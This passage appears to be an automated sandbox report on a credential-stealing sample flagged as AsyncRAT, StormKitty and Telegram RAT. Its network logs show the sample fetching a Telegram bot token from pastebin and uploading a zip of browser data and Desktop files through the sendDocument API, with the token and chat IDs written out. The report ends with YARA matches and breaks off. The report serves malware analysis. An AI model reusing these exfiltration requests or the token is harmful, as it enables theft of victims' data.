2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: 5c 44 65 73 6b 74 6f 70 5c 53 55 41 56 54 5a 4b 4e 46 4c 2e 6a 70 67 1d 93 39 92 60 21 0c 43 f3 a9 ea 43 b1 18 1b 30 bb 59 ef 7f 90 fe d3 09 01 81 6c 3f 49 63 aa 25 2f 66 c7 d5 4e 1f 7d 1d 2d d8 85 aa e2 89 b6 d0 a5 5c 36 b1 cc 4b 53 d7 97 15 d2 d9 a3 23 70 16 e1 3d ca 8a a4 63 83 88 90 53 b3 6e de 06 ae ce e4 16 3a ca a4 e1 2a 15 16 0d 7f 79 30 ae 37 46 bc 19 5c 09 18 4e dd 06 4f d1 fd ad 63 b7 b5 31 b2 c5 bd 38 9b 54 42 d4 43 5f 97 24 7a 7e a5 64 40 7e bb f4 99 8b 9c f0 3d 78 9a 4c 5d 0e 38 5a de e4 7c 2f a5 8e 86 e5 f1 6e c5 2a b9 e1 69 74 0b d2 50 fa ff 5d 39 ae 8e ad 10 99 41 4f 05 7f f7 63 c4 4f 1a 4a d3 02 ca c9 d1 2d 78 ea 4f db 5e 9d 45 5a 0e ef 03 4f ee 2e 5d d5 09 77 70 91 be 08 1c c0 3e 13 83 29 ec 0e c4 51 dd 1f 01 c2 fa 94 cd d9 a8 79 8d 80 Data Ascii: \Desktop\SUAVTZKNFL.jpg9`!CC0Yl?Ic%/fN}-\6KS#p=cSn:y07F\NOc18TBC_$z~d@~=xL]8Z\|/nitP]9AOcOJ-xO^EZO.]wp>)Qy
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: 5b 9b e8 65 f3 f4 b1 a3 ae 20 3d 73 f2 ec 2d 9c 63 8e 25 9a dc 17 d8 a6 9f 7b 1e 67 c5 db 69 59 f8 a8 44 5a 19 dd c7 75 d5 6c ab c4 81 31 dc db 37 65 23 00 d8 a3 29 b8 8e c3 ba 3f 94 be f3 a3 05 87 b5 32 9e 5e 43 57 a5 60 87 0f 33 b9 23 26 5f dd 6b 53 bd f1 fe 12 e4 2b 9b bc 3b 30 27 55 95 9f 7d 1d e3 72 63 eb 37 ab 1e d6 98 72 11 c9 df 0b 47 1e 4e f3 5a ad fe 8e 98 52 d8 55 86 3c c2 07 d3 f9 65 ec 64 c9 ab b4 4d 0d d5 0d ad 29 d0 7e c7 ae f2 b0 6e 75 a8 87 34 e8 fc 35 e7 03 f7 e6 c9 fe 07 f0 4a cb 6e 0f b0 a0 70 4e 10 03 af 5d e9 ae b1 d3 57 5c c8 ba 50 62 10 8a 3b c3 d6 4b b9 e0 52 1b b5 b4 de 5e d5 7c ca 71 50 09 8a ab 8b df a3 fe c5 0a c8 69 b3 6c df 89 25 34 ed 8b 56 8e 54 71 2e af f8 46 7d 9f 14 c5 d6 b4 83 b0 70 91 e3 4e 72 ae 3f d7 94 2c 25 a0 3e Data Ascii: [e =s-c%{giYDZul17e#)?2^CW`3#&_kS+;0'U}rc7rGNZRU<edM)~nu45JnpN]W\Pb;KR^\|qPil%4VTq.F}pNr?,%>
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: 89 1b e1 ea a8 bc a8 3c ba fe b6 b3 4a df a0 47 30 be f5 d1 c3 29 8d 53 b6 f4 dd fd c5 b2 90 af 4e 27 e8 63 9a 24 9c d5 9b bc 2f 7e 0b 8a b0 f5 49 d7 fb 1c 96 11 09 90 82 b9 71 a1 96 38 bb 34 25 61 c5 6d cb 56 4d d5 4b 2e 8d a3 77 e0 b8 b3 c7 14 eb 12 db 92 7b 88 f8 82 43 7d 9e ff 0c 70 09 13 16 9b 34 ec e8 59 cb 5e 87 16 cc d0 c3 0a 2e af 64 7c f8 ba 2a 53 46 72 14 8b 7f ec 21 c4 e0 cd 51 5a 1a 87 97 44 11 d7 1d 0a 29 3d 4e 75 3c 3f cc ce ef 57 07 85 f6 80 d3 df 97 85 6f 55 96 29 e7 e6 be a7 fd c9 86 16 f7 c0 ee f7 ec 9f 1e 6b f7 33 d7 16 5f 29 3d 76 a4 e8 40 3c c8 4e e3 85 61 1a 57 5d 29 a4 4f 5a 7b 45 3e e8 a0 49 fd 8f f9 6a ae de 9b 3a 0d 05 4e 46 0b 83 7e 74 db 51 3c f7 da cb b7 2d 84 52 6d 7a 8b 50 5c 3c 62 b1 27 c0 14 a2 46 f5 95 ee 02 91 34 dd ec Data Ascii: <JG0)SN'c$/~Iq84%amVMK.w{C}p4Y^.d\|*SFr!QZD)=Nu<?WoU)k3_)=v@<NaW])OZ{E>Ij:NF~tQ<-RmzP\<b'F4
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: eb 12 db 92 7b 88 f8 82 43 7d 9e ff 0c 70 09 13 16 9b 34 ec e8 59 cb 5e 87 16 cc d0 c3 0a 2e af 64 7c f8 ba 2a 53 46 72 14 8b 7f ec 21 c4 e0 cd 51 5a 1a 87 97 44 11 d7 1d 0a 29 3d 4e 75 3c 3f cc ce ef 57 07 85 f6 80 d3 df 97 85 6f 55 96 29 e7 e6 be a7 fd c9 86 16 f7 c0 ee f7 ec 9f 1e 6b f7 33 d7 16 5f 29 3d 76 a4 e8 40 3c c8 4e e3 85 61 1a 57 5d 29 a4 4f 5a 7b 45 3e e8 a0 49 fd 8f f9 6a ae de 9b 3a 0d 05 4e 46 0b 83 7e 74 db 51 3c f7 da cb b7 2d 84 52 6d 7a 8b 50 5c 3c 62 b1 27 c0 14 a2 46 f5 95 ee 02 91 34 dd ec 5b 86 a5 ca 78 ee 5d a9 f3 0e d2 d7 be be ac b9 4e 3f 99 5a 28 ca ec 33 e2 97 07 3d 58 47 9e d2 f7 10 d1 d5 f7 7d f2 c5 dd 5b 91 ac 28 28 7d 94 f0 6e 39 d0 e7 4f 54 a9 aa 79 f5 f2 af da 2f 2b ec 01 df 55 36 ae 0c 37 2c 4f 18 f3 50 73 f2 76 f2 f1 Data Ascii: {C}p4Y^.d\|*SFr!QZD)=Nu<?WoU)k3_)=v@<NaW])OZ{E>Ij:NF~tQ<-RmzP\<b'F4[x]N?Z(3=XG}[((}n9OTy/+U67,OPsv
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: c1 ea 22 0a 60 a1 85 32 40 a5 a9 d2 1a b5 ec 52 04 2b 27 49 c0 0a 23 97 50 54 1a b0 82 ed 56 0a b7 e4 52 68 50 a1 b9 84 a2 42 23 13 1d a6 78 3c 68 85 9e ad aa 24 9b 96 4f e8 9e 1f 3c a8 21 11 be a0 33 5a f3 b9 2d ca e4 de 36 f2 ac 2a f2 b4 3b cc 6c 1a ef ef f8 5e 81 88 ca 38 d6 b0 63 af 04 f6 31 34 ae fb a3 61 67 4b 0a 25 6a bb e6 10 56 49 b8 a8 a1 26 94 71 eb 9a 62 83 0a 8d 0c 6c bb 76 51 83 a5 01 ae 3f cb 12 b6 78 70 10 a0 fe d7 08 f7 06 45 0b 58 13 54 04 b0 63 88 8b da 61 46 de 1d ff f0 d4 1d 61 5f 71 1c 7b 55 5e 3c 53 74 77 e6 dd 0a ff 72 23 f1 95 8c 5f da 71 f7 44 f7 83 cd 6e be 5b f8 ef 93 5e 4b d0 f6 dc 7d 47 d3 7f 7c ba d9 64 20 44 24 02 5f 04 81 f4 c9 0f 06 2b 0e 07 03 b3 b4 bf d7 23 35 31 a3 d1 d2 c6 bb 58 de 3b 37 c2 5a 14 0c 5b 51 49 c1 5a 14 Data Ascii: "`2@R+'I#PTVRhPB#x<h$O<!3Z-6*;l^8c14agK%jVI&qblvQ?xpEXTcaFa_q{U^<Stwr#_qDn[^K}G\|d D$_+#51X;7Z[QIZ
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: 62 7e 7b e9 da ef 1a 5f 8b 93 c7 74 b1 17 cd 4b 8b d2 44 df 6f 14 f9 e9 8e 19 83 b9 7e d8 0f 84 70 7a 29 06 09 73 99 8a 4c 95 31 b0 70 c4 f6 a8 ad cd fb 06 50 c7 48 37 88 df ab fa 98 29 a6 5d 09 a1 37 20 e3 ac 54 ec d8 2f e3 21 cd b9 38 7e a7 e1 7f e6 3c 75 5c 45 f1 c8 f3 89 8b bb e7 79 f9 1d df d5 a0 46 8b 4b 72 1c b1 7c 76 0e c6 e0 05 9f d4 2b 97 4d 7f a6 01 bd 3e db bd b7 02 02 38 76 0a 92 1f 59 bc f5 44 06 90 b8 d4 44 a4 7b 4c 34 42 df 78 0f b9 18 10 87 bf a9 c3 fa 7f 4e f5 6b 0c 05 a1 f0 90 70 56 71 fe f6 af 75 e4 0c 9d bf 07 75 9a 51 1e 22 9c 9d 22 08 87 e1 0c 9b e0 72 18 e3 fd 98 b0 a7 7a 17 fb aa ba 53 f6 15 8a 77 ee c5 cf 6f 0a 71 bd 29 07 c6 ac c7 33 d3 8d 1d ce 72 6d 0d 39 5f 97 08 0f 75 4d b3 03 e0 d7 3c ea 8b 07 3a b8 99 d2 ee e7 52 49 64 3c Data Ascii: b~{_tKDo~pz)sL1pPH7)]7 T/!8~<u\EyFKr\|v+M>8vYDD{L4BxNkpVquuQ""rzSwoq)3rm9_uM<:RId<
2024-07-01 07:19:35 UTC	16355	OUT	Data Raw: 47 3f bb 02 68 d0 f0 26 93 b0 85 60 40 b2 ec 5d 2b 2d 46 1b cc 07 12 61 2a 5f f5 17 14 fb 32 ee ad 4f b5 9a 46 12 32 48 58 3b dc 10 bc 60 d3 a8 4f 1f 29 c2 66 2b 35 3c eb 7a d8 bf 7b 38 50 e6 72 ff 72 d2 3b 79 ab 1b 5a af 2f 4f f2 f4 8f 3f 03 80 7f a4 c1 91 31 61 c6 3a 24 0d 86 10 e1 91 59 ef 15 e8 39 2d aa 92 e8 18 24 0e a7 df 75 8e a3 31 bf d1 5f 87 e1 c9 c9 38 c4 ee 48 85 46 5e 9d 1c 35 1d 19 5b 4e 14 d2 72 7a 9e 2e 55 b3 39 c7 91 d4 1e 7d ff 19 ad d3 a3 0f db 55 f3 eb c6 b2 34 5b 21 5b 63 89 af 86 e0 bf e8 fe 3c d7 11 5e db 69 76 ce e4 cd f0 f0 d3 de ed 06 2d d4 8d ae 27 57 9d 93 55 20 cf 28 bd 65 87 0b 91 3d 3e f8 d1 ff ad ad d8 7c ad ce 71 47 a0 9e 31 63 e4 d8 e0 0c 87 3c 22 91 61 9e 11 e6 3e ba ab 7d 65 aa f4 03 b5 cb 02 04 17 bf 10 37 dc d2 32 6c Data Ascii: G?h&`@]+-Fa*_2OF2HX;`O)f+5<z{8Prr;yZ/O?1a:$Y9-$u1_8HF^5[Nrz.U9}U4[![c<^iv-'WU (e=>\|qG1c<"a>}e72l
2024-07-01 07:19:35 UTC	926	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 01 Jul 2024 07:19:35 GMT Content-Type: application/json Content-Length: 538 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":36,"from":{"id":7322917184,"is_bot":true,"first_name":"Xmarvelstealerbot","username":"Xmarvelstealerbot"},"chat":{"id":5635047295,"first_name":"Spam","last_name":"Plug \ud83d\udd0c","username":"spamplug","type":"private"},"date":1719818375,"document":{"file_name":"C_UsersuserAppDataLocal4f56288dfbc9a5af15947e7b835589a8user@.zip","mime_type":"application/zip","file_id":"BQACAgIAAxkDAAMkZoJYh_k047HxVPs-ckFb4qt3TeEAArhLAAJLUxBIMUG8x0aEQ8c1BA","file_unique_id":"AgADuEsAAktTEEg","file_size":188155}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49729	104.20.3.235	443	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:19:36 UTC	74	OUT	GET /raw/7B75u64B HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-07-01 07:19:36 UTC	391	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:19:36 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Sun, 30 Jun 2024 13:13:01 GMT Server: cloudflare CF-RAY: 89c4a0f549c64259-EWR
2024-07-01 07:19:36 UTC	52	IN	Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
2024-07-01 07:19:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49730	149.154.167.220	443	8040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:19:37 UTC	254	OUT	POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1 Content-Type: multipart/form-data; boundary="6fc0eb9b-b905-443d-9bab-0486ae47313c" Host: api.telegram.org Content-Length: 188508 Expect: 100-continue
2024-07-01 07:19:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-01 07:19:37 UTC	40	OUT	Data Raw: 2d 2d 36 66 63 30 65 62 39 62 2d 62 39 30 35 2d 34 34 33 64 2d 39 62 61 62 2d 30 34 38 36 61 65 34 37 33 31 33 63 0d 0a Data Ascii: --6fc0eb9b-b905-443d-9bab-0486ae47313c
2024-07-01 07:19:37 UTC	269	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 68 75 62 65 72 74 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 34 66 35 36 32 38 38 64 66 62 63 39 61 35 61 66 31 35 39 34 37 65 37 62 38 33 35 35 38 39 61 38 5c 68 75 62 65 72 74 40 39 36 30 37 38 31 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 68 75 62 65 72 74 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 34 66 35 36 32 38 38 64 66 62 63 39 61 35 61 66 31 35 39 34 37 65 37 62 38 33 35 35 38 39 61 38 25 35 43 68 75 62 65 72 74 25 34 30 39 36 30 37 38 31 Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C4f56288dfbc9a5af15947e7b835589a8%5Cuser%40960781
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 d1 44 e1 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 d1 44 e1 58 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 6b 1a e1 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 6b 1a e1 58 ba b9 27 3b 7e 01 00 00 35 04 00 00 17 00 00 00 44 Data Ascii: PKDXBrowsers\Edge\PKDXBrowsers\Google\PKkXQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKkX';~5D
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: 5c 44 65 73 6b 74 6f 70 5c 53 55 41 56 54 5a 4b 4e 46 4c 2e 6a 70 67 1d 93 39 92 60 21 0c 43 f3 a9 ea 43 b1 18 1b 30 bb 59 ef 7f 90 fe d3 09 01 81 6c 3f 49 63 aa 25 2f 66 c7 d5 4e 1f 7d 1d 2d d8 85 aa e2 89 b6 d0 a5 5c 36 b1 cc 4b 53 d7 97 15 d2 d9 a3 23 70 16 e1 3d ca 8a a4 63 83 88 90 53 b3 6e de 06 ae ce e4 16 3a ca a4 e1 2a 15 16 0d 7f 79 30 ae 37 46 bc 19 5c 09 18 4e dd 06 4f d1 fd ad 63 b7 b5 31 b2 c5 bd 38 9b 54 42 d4 43 5f 97 24 7a 7e a5 64 40 7e bb f4 99 8b 9c f0 3d 78 9a 4c 5d 0e 38 5a de e4 7c 2f a5 8e 86 e5 f1 6e c5 2a b9 e1 69 74 0b d2 50 fa ff 5d 39 ae 8e ad 10 99 41 4f 05 7f f7 63 c4 4f 1a 4a d3 02 ca c9 d1 2d 78 ea 4f db 5e 9d 45 5a 0e ef 03 4f ee 2e 5d d5 09 77 70 91 be 08 1c c0 3e 13 83 29 ec 0e c4 51 dd 1f 01 c2 fa 94 cd d9 a8 79 8d 80 Data Ascii: \Desktop\SUAVTZKNFL.jpg9`!CC0Yl?Ic%/fN}-\6KS#p=cSn:y07F\NOc18TBC_$z~d@~=xL]8Z\|/nitP]9AOcOJ-xO^EZO.]wp>)Qy
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: 5b 9b e8 65 f3 f4 b1 a3 ae 20 3d 73 f2 ec 2d 9c 63 8e 25 9a dc 17 d8 a6 9f 7b 1e 67 c5 db 69 59 f8 a8 44 5a 19 dd c7 75 d5 6c ab c4 81 31 dc db 37 65 23 00 d8 a3 29 b8 8e c3 ba 3f 94 be f3 a3 05 87 b5 32 9e 5e 43 57 a5 60 87 0f 33 b9 23 26 5f dd 6b 53 bd f1 fe 12 e4 2b 9b bc 3b 30 27 55 95 9f 7d 1d e3 72 63 eb 37 ab 1e d6 98 72 11 c9 df 0b 47 1e 4e f3 5a ad fe 8e 98 52 d8 55 86 3c c2 07 d3 f9 65 ec 64 c9 ab b4 4d 0d d5 0d ad 29 d0 7e c7 ae f2 b0 6e 75 a8 87 34 e8 fc 35 e7 03 f7 e6 c9 fe 07 f0 4a cb 6e 0f b0 a0 70 4e 10 03 af 5d e9 ae b1 d3 57 5c c8 ba 50 62 10 8a 3b c3 d6 4b b9 e0 52 1b b5 b4 de 5e d5 7c ca 71 50 09 8a ab 8b df a3 fe c5 0a c8 69 b3 6c df 89 25 34 ed 8b 56 8e 54 71 2e af f8 46 7d 9f 14 c5 d6 b4 83 b0 70 91 e3 4e 72 ae 3f d7 94 2c 25 a0 3e Data Ascii: [e =s-c%{giYDZul17e#)?2^CW`3#&_kS+;0'U}rc7rGNZRU<edM)~nu45JnpN]W\Pb;KR^\|qPil%4VTq.F}pNr?,%>
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: 89 1b e1 ea a8 bc a8 3c ba fe b6 b3 4a df a0 47 30 be f5 d1 c3 29 8d 53 b6 f4 dd fd c5 b2 90 af 4e 27 e8 63 9a 24 9c d5 9b bc 2f 7e 0b 8a b0 f5 49 d7 fb 1c 96 11 09 90 82 b9 71 a1 96 38 bb 34 25 61 c5 6d cb 56 4d d5 4b 2e 8d a3 77 e0 b8 b3 c7 14 eb 12 db 92 7b 88 f8 82 43 7d 9e ff 0c 70 09 13 16 9b 34 ec e8 59 cb 5e 87 16 cc d0 c3 0a 2e af 64 7c f8 ba 2a 53 46 72 14 8b 7f ec 21 c4 e0 cd 51 5a 1a 87 97 44 11 d7 1d 0a 29 3d 4e 75 3c 3f cc ce ef 57 07 85 f6 80 d3 df 97 85 6f 55 96 29 e7 e6 be a7 fd c9 86 16 f7 c0 ee f7 ec 9f 1e 6b f7 33 d7 16 5f 29 3d 76 a4 e8 40 3c c8 4e e3 85 61 1a 57 5d 29 a4 4f 5a 7b 45 3e e8 a0 49 fd 8f f9 6a ae de 9b 3a 0d 05 4e 46 0b 83 7e 74 db 51 3c f7 da cb b7 2d 84 52 6d 7a 8b 50 5c 3c 62 b1 27 c0 14 a2 46 f5 95 ee 02 91 34 dd ec Data Ascii: <JG0)SN'c$/~Iq84%amVMK.w{C}p4Y^.d\|*SFr!QZD)=Nu<?WoU)k3_)=v@<NaW])OZ{E>Ij:NF~tQ<-RmzP\<b'F4
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: eb 12 db 92 7b 88 f8 82 43 7d 9e ff 0c 70 09 13 16 9b 34 ec e8 59 cb 5e 87 16 cc d0 c3 0a 2e af 64 7c f8 ba 2a 53 46 72 14 8b 7f ec 21 c4 e0 cd 51 5a 1a 87 97 44 11 d7 1d 0a 29 3d 4e 75 3c 3f cc ce ef 57 07 85 f6 80 d3 df 97 85 6f 55 96 29 e7 e6 be a7 fd c9 86 16 f7 c0 ee f7 ec 9f 1e 6b f7 33 d7 16 5f 29 3d 76 a4 e8 40 3c c8 4e e3 85 61 1a 57 5d 29 a4 4f 5a 7b 45 3e e8 a0 49 fd 8f f9 6a ae de 9b 3a 0d 05 4e 46 0b 83 7e 74 db 51 3c f7 da cb b7 2d 84 52 6d 7a 8b 50 5c 3c 62 b1 27 c0 14 a2 46 f5 95 ee 02 91 34 dd ec 5b 86 a5 ca 78 ee 5d a9 f3 0e d2 d7 be be ac b9 4e 3f 99 5a 28 ca ec 33 e2 97 07 3d 58 47 9e d2 f7 10 d1 d5 f7 7d f2 c5 dd 5b 91 ac 28 28 7d 94 f0 6e 39 d0 e7 4f 54 a9 aa 79 f5 f2 af da 2f 2b ec 01 df 55 36 ae 0c 37 2c 4f 18 f3 50 73 f2 76 f2 f1 Data Ascii: {C}p4Y^.d\|*SFr!QZD)=Nu<?WoU)k3_)=v@<NaW])OZ{E>Ij:NF~tQ<-RmzP\<b'F4[x]N?Z(3=XG}[((}n9OTy/+U67,OPsv
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: c1 ea 22 0a 60 a1 85 32 40 a5 a9 d2 1a b5 ec 52 04 2b 27 49 c0 0a 23 97 50 54 1a b0 82 ed 56 0a b7 e4 52 68 50 a1 b9 84 a2 42 23 13 1d a6 78 3c 68 85 9e ad aa 24 9b 96 4f e8 9e 1f 3c a8 21 11 be a0 33 5a f3 b9 2d ca e4 de 36 f2 ac 2a f2 b4 3b cc 6c 1a ef ef f8 5e 81 88 ca 38 d6 b0 63 af 04 f6 31 34 ae fb a3 61 67 4b 0a 25 6a bb e6 10 56 49 b8 a8 a1 26 94 71 eb 9a 62 83 0a 8d 0c 6c bb 76 51 83 a5 01 ae 3f cb 12 b6 78 70 10 a0 fe d7 08 f7 06 45 0b 58 13 54 04 b0 63 88 8b da 61 46 de 1d ff f0 d4 1d 61 5f 71 1c 7b 55 5e 3c 53 74 77 e6 dd 0a ff 72 23 f1 95 8c 5f da 71 f7 44 f7 83 cd 6e be 5b f8 ef 93 5e 4b d0 f6 dc 7d 47 d3 7f 7c ba d9 64 20 44 24 02 5f 04 81 f4 c9 0f 06 2b 0e 07 03 b3 b4 bf d7 23 35 31 a3 d1 d2 c6 bb 58 de 3b 37 c2 5a 14 0c 5b 51 49 c1 5a 14 Data Ascii: "`2@R+'I#PTVRhPB#x<h$O<!3Z-6*;l^8c14agK%jVI&qblvQ?xpEXTcaFa_q{U^<Stwr#_qDn[^K}G\|d D$_+#51X;7Z[QIZ
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: 62 7e 7b e9 da ef 1a 5f 8b 93 c7 74 b1 17 cd 4b 8b d2 44 df 6f 14 f9 e9 8e 19 83 b9 7e d8 0f 84 70 7a 29 06 09 73 99 8a 4c 95 31 b0 70 c4 f6 a8 ad cd fb 06 50 c7 48 37 88 df ab fa 98 29 a6 5d 09 a1 37 20 e3 ac 54 ec d8 2f e3 21 cd b9 38 7e a7 e1 7f e6 3c 75 5c 45 f1 c8 f3 89 8b bb e7 79 f9 1d df d5 a0 46 8b 4b 72 1c b1 7c 76 0e c6 e0 05 9f d4 2b 97 4d 7f a6 01 bd 3e db bd b7 02 02 38 76 0a 92 1f 59 bc f5 44 06 90 b8 d4 44 a4 7b 4c 34 42 df 78 0f b9 18 10 87 bf a9 c3 fa 7f 4e f5 6b 0c 05 a1 f0 90 70 56 71 fe f6 af 75 e4 0c 9d bf 07 75 9a 51 1e 22 9c 9d 22 08 87 e1 0c 9b e0 72 18 e3 fd 98 b0 a7 7a 17 fb aa ba 53 f6 15 8a 77 ee c5 cf 6f 0a 71 bd 29 07 c6 ac c7 33 d3 8d 1d ce 72 6d 0d 39 5f 97 08 0f 75 4d b3 03 e0 d7 3c ea 8b 07 3a b8 99 d2 ee e7 52 49 64 3c Data Ascii: b~{_tKDo~pz)sL1pPH7)]7 T/!8~<u\EyFKr\|v+M>8vYDD{L4BxNkpVquuQ""rzSwoq)3rm9_uM<:RId<
2024-07-01 07:19:37 UTC	16355	OUT	Data Raw: 47 3f bb 02 68 d0 f0 26 93 b0 85 60 40 b2 ec 5d 2b 2d 46 1b cc 07 12 61 2a 5f f5 17 14 fb 32 ee ad 4f b5 9a 46 12 32 48 58 3b dc 10 bc 60 d3 a8 4f 1f 29 c2 66 2b 35 3c eb 7a d8 bf 7b 38 50 e6 72 ff 72 d2 3b 79 ab 1b 5a af 2f 4f f2 f4 8f 3f 03 80 7f a4 c1 91 31 61 c6 3a 24 0d 86 10 e1 91 59 ef 15 e8 39 2d aa 92 e8 18 24 0e a7 df 75 8e a3 31 bf d1 5f 87 e1 c9 c9 38 c4 ee 48 85 46 5e 9d 1c 35 1d 19 5b 4e 14 d2 72 7a 9e 2e 55 b3 39 c7 91 d4 1e 7d ff 19 ad d3 a3 0f db 55 f3 eb c6 b2 34 5b 21 5b 63 89 af 86 e0 bf e8 fe 3c d7 11 5e db 69 76 ce e4 cd f0 f0 d3 de ed 06 2d d4 8d ae 27 57 9d 93 55 20 cf 28 bd 65 87 0b 91 3d 3e f8 d1 ff ad ad d8 7c ad ce 71 47 a0 9e 31 63 e4 d8 e0 0c 87 3c 22 91 61 9e 11 e6 3e ba ab 7d 65 aa f4 03 b5 cb 02 04 17 bf 10 37 dc d2 32 6c Data Ascii: G?h&`@]+-Fa*_2OF2HX;`O)f+5<z{8Prr;yZ/O?1a:$Y9-$u1_8HF^5[Nrz.U9}U4[![c<^iv-'WU (e=>\|qG1c<"a>}e72l
2024-07-01 07:19:38 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Mon, 01 Jul 2024 07:19:38 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	0
Start time:	03:18:02
Start date:	01/07/2024
Path:	C:\Users\user\Desktop\Kh7W85ONS7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Kh7W85ONS7.exe"
Imagebase:	0x1d0000
File size:	526'928 bytes
MD5 hash:	395C4070233D059B2F1661FBDC6AF0B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2128978665.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2127288804.0000000003CEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 